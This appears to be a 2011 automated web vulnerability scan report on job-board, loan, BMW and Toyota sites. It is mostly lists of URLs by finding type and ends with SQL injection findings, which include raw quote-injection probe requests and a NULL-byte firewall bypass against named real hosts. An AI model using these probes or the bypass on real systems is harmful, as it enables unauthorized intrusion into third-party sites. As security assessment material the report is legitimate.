15.267. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35isportactivity/x5seriessavmediagallery.aspx

15.268. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive50i/default.aspx

15.269. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive50i/features_and_specs/default.aspx

15.270. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive50i/modelhighlights/default.aspx

15.271. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive50i/x5seriessavmediagallery.aspx

15.272. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/default.aspx

15.273. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/default.aspx%20

15.274. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/features_and_specs/default.aspx

15.275. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/features_and_specs/default.aspx%20

15.276. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/modelhighlights/default.aspx

15.277. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/modelhighlights/default.aspx%20

15.278. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/x6seriessacmediagallery.aspx

15.279. http://www.bmwusa.com/standard/content/vehicles/2011/x6/default.aspx

15.280. http://www.bmwusa.com/standard/content/vehicles/2011/x6/x6explore.aspx

15.281. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive35i/default.aspx

15.282. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive35i/features_and_specs/default.aspx

15.283. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive35i/modelhighlights/default.aspx

15.284. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive35i/x6seriessacmediagallery.aspx

15.285. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive50i/default.aspx

15.286. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive50i/features_and_specs/default.aspx

15.287. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive50i/modelhighlights/default.aspx

15.288. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive50i/x6seriessacmediagallery.aspx

15.289. http://www.bmwusa.com/standard/content/vehicles/2011/z4/default.aspx%20

15.290. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4explore.aspx

15.291. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive30i/default.aspx

15.292. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive30i/modelhighlights/default.aspx

15.293. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive30i/z4seriesroadstermediagallery.aspx

15.294. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive35i/default.aspx

15.295. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive35i/modelhighlights/default.aspx

15.296. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive35i/z4seriesroadstermediagallery.aspx

15.297. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx

15.298. http://www.businessanalystcrossing.com/

15.299. http://www.businessdevelopmentcrossing.com/

15.300. http://www.businessweek.com/news/2011-01-20/merrill-lynch-jm-said-to-be-hired-for-power-finance-share-sale.html

15.301. http://www.callcentercrossing.com/

15.302. http://www.chefcrossing.com/

15.303. http://www.civilengineeringcrossing.com/

15.304. http://www.clevelcrossing.com/

15.305. http://www.clinicalresearchcrossing.com/

15.306. http://www.codylindley.com/

15.307. http://www.compliancecrossing.com/

15.308. http://www.computeraideddesigncrossing.com/

15.309. http://www.constructioncrossing.com/

15.310. http://www.consultingcrossing.com/

15.311. http://www.contractmanagementcrossing.com/

15.312. http://www.counselingcrossing.com/

15.313. http://www.cpluspluscrossing.com/

15.314. http://www.csmonitor.com/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal

15.315. http://www.csmonitor.com/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity

15.316. http://www.customerservicecrossing.com/

15.317. http://www.dbacrossing.com/

15.318. http://www.dentalcrossing.com/

15.319. http://www.designingcrossing.com/

15.320. http://www.directstartv.com/

15.321. http://www.diversitycrossing.com/

15.322. http://www.dotnetcrossing.com/

15.323. http://www.ecommercecrossing.com/

15.324. http://www.edfed.com/

15.325. http://www.editingcrossing.com/

15.326. http://www.educationcrossing.com/

15.327. http://www.employmentauthority.com/

15.328. http://www.employmentcrossing.com/

15.329. http://www.energycrossing.com/

15.330. http://www.engineeringcrossing.com/

15.331. http://www.entrylevelcrossing.com/

15.332. http://www.environmentalcrossing.com/

15.333. http://www.environmentalsafetyhealthcrossing.com/

15.334. http://www.ericmmartin.com/projects/simplemodal/

15.335. http://www.erpcrossing.com/

15.336. http://www.execcrossing.com/

15.337. http://www.facebook.com/BMWUSA

15.338. http://www.facebook.com/EmploymentXing

15.339. http://www.facebook.com/pages/JD2B/298408284363

15.340. http://www.facebook.com/piyush.v.bhatt

15.341. http://www.facebook.com/plugins/like.php

15.342. http://www.facebook.com/plugins/likebox.php

15.343. http://www.facebook.com/yahoonews

15.344. http://www.facilitiescrossing.com/

15.345. http://www.financialservicescrossing.com/

15.346. http://www.foodservicescrossing.com/

15.347. http://www.fundraisingcrossing.com/

15.348. http://www.giscrossing.com/

15.349. http://www.governmentcrossing.com/

15.350. http://www.graduateschoolloans.com/

15.351. http://www.healthcarecrossing.com/

15.352. http://www.helpdeskcrossing.com/

15.353. http://www.hospitalitycrossing.com/

15.354. http://www.hototc.com/

15.355. http://www.hound.com/

15.356. http://www.hrcrossing.com/

15.357. http://www.huffingtonpost.com/2011/01/05/david-koch-tea-party-republicans_n_804997.html

15.358. http://www.huffingtonpost.com/2011/01/12/sarah-palin-arizona-shooting-statement_n_807833.html

15.359. http://www.huffingtonpost.com/2011/01/19/craziest-ways-to-pay-tuit_n_811038.html

15.360. http://www.hvaccrossing.com/

15.361. http://www.informationtechnologycrossing.com/

15.362. http://www.insurcrossing.com/

15.363. http://www.intellectualpropertycrossing.com/

15.364. http://www.internshipcrossing.com/

15.365. http://www.j2eecrossing.com/

15.366. http://www.journalismcrossing.com/

15.367. http://www.lawcrossing.com/

15.368. http://www.lawcrossing.com/article/6070/Brooklyn-Law-School/

15.369. http://www.lawcrossing.com/article/6154/Anne-Healy-LIDS/

15.370. http://www.lawcrossing.com/images/banner/lc_bannerforjdj125x125.gif/

15.371. http://www.lawcrossing.com/lcjssearchresults.php

15.372. http://www.lawcrossing.com/salarysurvey/lcsalarysurvey.php

15.373. http://www.lawfirmstaff.com/

15.374. http://www.lawschoolloanreport.org/

15.375. http://www.lawschoolloans.com/

15.376. https://www.lawschoolloans.com/lslprivateloan_application.php

15.377. http://www.legalauthority.com/

15.378. http://www.legalauthority.com/signup.php

15.379. http://www.logisticscrossing.com/

15.380. http://www.managercrossing.com/

15.381. http://www.manufacturingcrossing.com/

15.382. http://www.marketingcrossing.com/

15.383. http://www.mediajobcrossing.com/

15.384. http://www.medicalschoolloans.com/

15.385. http://www.militarycrossing.com/

15.386. http://www.msnbc.msn.com/id/41161439/ns/politics-more_politics/

15.387. http://www.nursingcrossing.com/

15.388. http://www.occupationaltherapycrossing.com/

15.389. http://www.opensource.org/licenses/gpl-license.php

15.390. http://www.opensource.org/licenses/mit-license.php

15.391. http://www.operationscrossing.com/

15.392. http://www.parttimecrossing.com/

15.393. http://www.pharmaceuticalcrossing.com/

15.394. http://www.physicalsecuritycrossing.com/

15.395. http://www.physicaltherapycrossing.com/

15.396. http://www.planningcrossing.com/

15.397. http://www.politico.com/blogs/onmedia/1210/Assanges_memoir_advance_tops_1_million.html

15.398. http://www.postdoctoralfellowcrossing.com/

15.399. http://www.prcrossing.com/

15.400. http://www.preferredresumes.com/

15.401. http://www.procurementcrossing.com/

15.402. http://www.productmanagercrossing.com/

15.403. http://www.projectmanagementcrossing.com/

15.404. http://www.publicinterestcrossing.com/

15.405. http://www.publishingcrossing.com/

15.406. http://www.purchasingcrossing.com/

15.407. http://www.qaqccrossing.com/

15.408. http://www.radiocrossing.com/

15.409. http://www.realestateandlandcrossing.com/

15.410. http://www.recruitingcrossing.com/

15.411. http://www.researchingcrossing.com/

15.412. http://www.retailcrossing.com/

15.413. http://www.rollingstone.com/music/albumreviews/low-country-blues-20110114

15.414. http://www.sciencescrossing.com/

15.415. http://www.scientistcrossing.com/

15.416. http://www.sellingcrossing.com/

15.417. http://www.sourcewatch.org/index.php

15.418. http://www.sqlcrossing.com/

15.419. http://www.teenagercrossing.com/

15.420. http://www.telecomcrossing.com/

15.421. http://www.toyota.com/dealers/

15.422. http://www.toyota.com/ideas-for-good/

15.423. http://www.toyota.com/mobilepromo/

15.424. http://www.toyota.com/safety/

15.425. http://www.toyota.com/toyota-care/

15.426. http://www.tradingcrossing.com/

15.427. http://www.trainingcrossing.com/

15.428. http://www.transportationcrossing.com/

15.429. http://www.travelingcrossing.com/

15.430. http://www.truckingcrossing.com/

15.431. http://www.tvcrossing.com/

15.432. http://www.underwritingcrossing.com/

15.433. http://www.usatoday.com/money/world/2011-01-20-chinabuilding20_ST_N.htm

15.434. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP

15.435. http://www.veterinarycrossing.com/

15.436. http://www.volunteercrossing.com/

15.437. http://www.woothemes.com/

15.438. http://www.workathomecrossing.com/

15.439. http://www.writingcrossing.com/

16. Directory listing

17. Email addresses disclosed

17.1. http://www.aharrisonbarnes.com/

17.2. http://www.aharrisonbarnes.com/contact-us/script/functions.js

17.3. http://www.aharrisonbarnes.com/do-not-stop-seeing-opportunity-step-outside-your-minds-comfort-zone-and-begin-to-dream/

17.4. http://www.aharrisonbarnes.com/push-yourself-outside-your-comfort-zone/

17.5. http://www.aharrisonbarnes.com/wp-content/plugins/drop-caps/'dropcaps-no-ie.css'%20screen

17.6. http://www.aharrisonbarnes.com/wp-content/themes/HB_new_theme/javascript/tabber.js

17.7. http://www.bcgsearch.com/searchresults.php

17.8. http://www.bmwusa.com/JavaScript/jQuery/plugins/jquery.hoverIntent.minified.js

17.9. http://www.bmwusa.com/JavaScript/s_code.js

17.10. https://www.bmwusa.com/JavaScript/jQuery/plugins/jquery.hoverIntent.minified.js

17.11. https://www.bmwusa.com/JavaScript/s_code.js

17.12. http://www.businessweek.com/news/2011-01-20/merrill-lynch-jm-said-to-be-hired-for-power-finance-share-sale.html

17.13. http://www.directstartv.com/

17.14. http://www.huffingtonpost.com/2011/01/05/david-koch-tea-party-republicans_n_804997.html

17.15. http://www.huffingtonpost.com/2011/01/12/sarah-palin-arizona-shooting-statement_n_807833.html

17.16. http://www.intelliprice.com/intellipricedealer/start.htm

17.17. http://www.lawcrossing.com/

17.18. http://www.legalauthority.com/signup.php

17.19. http://www.msnbc.msn.com/id/41161439/ns/politics-more_politics/

17.20. http://www.opensource.org/licenses/gpl-license.php

17.21. http://www.opensource.org/licenses/mit-license.php

17.22. http://www.politico.com/blogs/onmedia/1210/Assanges_memoir_advance_tops_1_million.html

17.23. http://www.toyota.com/js/global/global.js

17.24. http://www.toyotafinancial.com/consumer/framework/skins/tfs/js/calendar.js

17.25. http://www.toyotafinancial.com/consumer/framework/skins/tfs/js/prototype.js

17.26. http://www.usatoday.com/money/world/2011-01-20-chinabuilding20_ST_N.htm

17.27. http://www.velaw.com/WorkArea/java/ektron.js

17.28. http://www.velaw.com/lawyers/DavidBlumental.aspx

17.29. http://www.velaw.com/lawyers/DavidDAlessandro.aspx

17.30. http://www.velaw.com/lawyers/JaneVris.aspx

17.31. http://www.velaw.com/offices/Dallas.aspx

17.32. http://www.velaw.com/offices/Houston.aspx

18. Private IP addresses disclosed

18.1. http://www.toyotafinancial.com/consumer/tfs.portal

18.2. https://www.toyotafinancial.com/consumer/tfs.portal

19. Robots.txt file

19.1. http://www.bilingualcrossing.com/

19.2. http://www.biotechcrossing.com/

19.3. http://www.bluecollarcrossing.com/

19.4. http://www.businessanalystcrossing.com/

19.5. http://www.businessdevelopmentcrossing.com/

19.6. http://www.callcentercrossing.com/

19.7. http://www.chefcrossing.com/

19.8. http://www.civilengineeringcrossing.com/

19.9. http://www.clevelcrossing.com/

19.10. http://www.clinicalresearchcrossing.com/

19.11. http://www.compliancecrossing.com/

19.12. http://www.computeraideddesigncrossing.com/

19.13. http://www.constructioncrossing.com/

19.14. http://www.consultingcrossing.com/

19.15. http://www.contractmanagementcrossing.com/

19.16. http://www.counselingcrossing.com/

19.17. http://www.cpluspluscrossing.com/

19.18. http://www.csmonitor.com/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal

19.19. http://www.customerservicecrossing.com/

19.20. http://www.dbacrossing.com/

19.21. http://www.dentalcrossing.com/

19.22. http://www.designingcrossing.com/

19.23. http://www.diversitycrossing.com/

19.24. http://www.dotnetcrossing.com/

19.25. http://www.ecommercecrossing.com/

19.26. http://www.edfed.com/

19.27. http://www.editingcrossing.com/

19.28. http://www.educationcrossing.com/

19.29. http://www.employmentauthority.com/

19.30. http://www.employmentcrossing.com/

19.31. http://www.energycrossing.com/

19.32. http://www.engineeringcrossing.com/

19.33. http://www.entrylevelcrossing.com/

19.34. http://www.environmentalcrossing.com/

19.35. http://www.environmentalsafetyhealthcrossing.com/

19.36. http://www.erpcrossing.com/

19.37. http://www.execcrossing.com/

19.38. http://www.facilitiescrossing.com/

19.39. http://www.financialservicescrossing.com/

19.40. http://www.foodservicescrossing.com/

19.41. http://www.fundraisingcrossing.com/

19.42. http://www.giscrossing.com/

19.43. http://www.governmentcrossing.com/

19.44. http://www.graduateschoolloans.com/

19.45. http://www.healthcarecrossing.com/

19.46. http://www.helpdeskcrossing.com/

19.47. http://www.hospitalitycrossing.com/

19.48. http://www.hrcrossing.com/

19.49. http://www.huffingtonpost.com/2011/01/12/sarah-palin-arizona-shooting-statement_n_807833.html

19.50. http://www.hvaccrossing.com/

19.51. http://www.informationtechnologycrossing.com/

19.52. http://www.insurcrossing.com/

19.53. http://www.intellectualpropertycrossing.com/

19.54. http://www.internshipcrossing.com/

19.55. http://www.j2eecrossing.com/

19.56. http://www.journalismcrossing.com/

19.57. http://www.logisticscrossing.com/

19.58. http://www.managercrossing.com/

19.59. http://www.manufacturingcrossing.com/

19.60. http://www.marketingcrossing.com/

19.61. http://www.mediajobcrossing.com/

19.62. http://www.medicalschoolloans.com/

19.63. http://www.militarycrossing.com/

19.64. http://www.msnbc.msn.com/id/41161439/ns/politics-more_politics/

19.65. http://www.nursingcrossing.com/

19.66. http://www.nytimes.com/2011/01/18/books/18book.html

19.67. http://www.occupationaltherapycrossing.com/

19.68. http://www.operationscrossing.com/

19.69. http://www.parttimecrossing.com/

19.70. http://www.pharmaceuticalcrossing.com/

19.71. http://www.physicalsecuritycrossing.com/

19.72. http://www.physicaltherapycrossing.com/

19.73. http://www.planningcrossing.com/

19.74. http://www.politico.com/blogs/onmedia/1210/Assanges_memoir_advance_tops_1_million.html

19.75. http://www.postdoctoralfellowcrossing.com/

19.76. http://www.prcrossing.com/

19.77. http://www.procurementcrossing.com/

19.78. http://www.productmanagercrossing.com/

19.79. http://www.projectmanagementcrossing.com/

19.80. http://www.publicinterestcrossing.com/

19.81. http://www.publishingcrossing.com/

19.82. http://www.purchasingcrossing.com/

19.83. http://www.qaqccrossing.com/

19.84. http://www.radiocrossing.com/

19.85. http://www.realestateandlandcrossing.com/

19.86. http://www.recruitingcrossing.com/

19.87. http://www.researchingcrossing.com/

19.88. http://www.retailcrossing.com/

19.89. http://www.rollingstone.com/music/albumreviews/low-country-blues-20110114

19.90. http://www.sciencescrossing.com/

19.91. http://www.scientistcrossing.com/

19.92. http://www.sellingcrossing.com/

19.93. http://www.sqlcrossing.com/

19.94. http://www.teenagercrossing.com/

19.95. http://www.telecomcrossing.com/

19.96. http://www.tradingcrossing.com/

19.97. http://www.trainingcrossing.com/

19.98. http://www.transportationcrossing.com/

19.99. http://www.travelingcrossing.com/

19.100. http://www.truckingcrossing.com/

19.101. http://www.tvcrossing.com/

19.102. http://www.underwritingcrossing.com/

19.103. http://www.usatoday.com/money/world/2011-01-20-chinabuilding20_ST_N.htm

19.104. http://www.veterinarycrossing.com/

19.105. http://www.volunteercrossing.com/

19.106. http://www.workathomecrossing.com/

19.107. http://www.writingcrossing.com/

20. Cacheable HTTPS response

20.1. https://www.bmwusa.com/Secured/FrameCheck.aspx

20.2. https://www.lowermybills.com/lending/home-refinance/

20.3. https://www.toyotafinancial.com/consumer/tfs.portal

21. HTML does not specify charset

21.1. https://www.lowermybills.com/lending/home-refinance/

21.2. http://www.softcomplex.com/products/tigra_calendar_pro/

21.3. http://www.toyota.co.jp/en/index.html

21.4. http://www.toyota.com/download-brochure.html

21.5. http://www.usatoday.com/money/world/2011-01-20-chinabuilding20_ST_N.htm

21.6. http://www.washingtonpost.com/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354

21.7. http://www.washingtonpost.com/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354%20%20%20%20%20%20%20%20%20businessweek.com/ap/financialnews/D9J%20%20%20%20nytimes.com/2010/11/29/technology/29paypal.html%20%20%20%20%20%20%20%20%20%20%20bloomberg.com/news/2010-11-2cQtwMwAw

22. Content type incorrectly stated

22.1. http://www.100kcrossing.com/favicon.ico

22.2. http://www.aharrisonbarnes.com/wp-content/plugins/wishlist-member/js/ZeroClipboard.wlm.js.php

22.3. http://www.aharrisonbarnes.com/wp-content/plugins/wordpress-thread-comment/wp-thread-comment.js.php

22.4. http://www.aharrisonbarnes.com/wp-content/themes/HB_new_theme/images/career_mission.png

22.5. http://www.bcgsearch.com/favicon.ico

22.6. http://www.legalauthority.com/tmviewbanner.php

22.7. http://www.toyota.com/img/mobilepromo/mobileLogoBottom.gif

22.8. http://www.toyotafinancial.com/consumer/framework/skins/tfs/js/myGuideParameters.js

23. SSL certificate



1. SQL injection
There are 9 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://www.edfed.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.edfed.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /?1%00'=1 HTTP/1.1
Host: www.edfed.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:58 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=j2smse82ucu5hpipl3grpjvjk4; path=/; domain=edfed.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 154420

<script type="text/javascript" src="http://www.edfed.com/script/overlibmws.js"></script>
<script type="text/javascript" src="http://www.edfed.com/script/overlibmws_scroll.js"></script>
<script type="t
...[SNIP]...
told me it would be! The monthly payment that they expected me to make was ridiculous! How could I, a recent grad, afford to make payments like that every month? I called to complain to them about the error on my account. They told me that the person th...<br>
...[SNIP]...

Request 2

GET /?1%00''=1 HTTP/1.1
Host: www.edfed.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:59 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=l24gtaf6dhq2v58ea3g6mcl5b1; path=/; domain=edfed.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 154341

<script type="text/javascript" src="http://www.edfed.com/script/overlibmws.js"></script>
<script type="text/javascript" src="http://www.edfed.com/script/overlibmws_scroll.js"></script>
<script type="t
...[SNIP]...

1.2. http://www.lawcrossing.com/lcjssearchresults.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.lawcrossing.com
Path:   /lcjssearchresults.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /lcjssearchresults.php' HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:50 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=768gpl04fukvao3vkb03tcqct6; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 19:41:51 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 211210

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Legal Jobs | Law Jobs | Legal Job Search | Law Firm And Legal Recruiter | La
...[SNIP]...
<td colspan="2" height="25" class="error" style="font-size:12px;">
...[SNIP]...
report, Hate Crime Statistics, that revealed a 25% increase of hate crimes against Latinos in just three short years. Interestingly (or maybe not), this coincided with the new and growing interest of illegal immigration from Mexico in the United States.
<br>
...[SNIP]...

Request 2

GET /lcjssearchresults.php'' HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 21 Jan 2011 19:41:52 GMT
Server: Apache
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ukbkja300kfsovlq2ha0blbke4; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 19:41:52 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103002

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...

1.3. http://www.lawcrossing.com/salarysurvey/lcsalarysurvey.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.lawcrossing.com
Path:   /salarysurvey/lcsalarysurvey.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /salarysurvey/lcsalarysurvey.php' HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 404 Not Found
Date: Fri, 21 Jan 2011 22:31:01 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=hkesccpn53pmrddrmv4i22hhn0; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:31:02 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 102960

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...
<td colspan="2" height="25" class="error" style="font-size:12px;">
...[SNIP]...

Request 2

GET /salarysurvey/lcsalarysurvey.php'' HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 21 Jan 2011 22:31:02 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=pl71ivi9iep0n3gtatr6dgnog5; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:31:02 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103039

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...

1.4. http://www.lawcrossing.com/salarysurvey/lcsalarysurvey.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.lawcrossing.com
Path:   /salarysurvey/lcsalarysurvey.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /salarysurvey/lcsalarysurvey.php/1' HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 404 Not Found
Date: Fri, 21 Jan 2011 22:30:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=3019nb68albbrm8rj2qutsp212; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:30:17 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103077

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...
<td colspan="2" height="25" class="error" style="font-size:12px;">
...[SNIP]...

Request 2

GET /salarysurvey/lcsalarysurvey.php/1'' HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 21 Jan 2011 22:30:18 GMT
Server: Apache
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=jieha937m8arnb548qci7an0j2; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:30:18 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103078

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
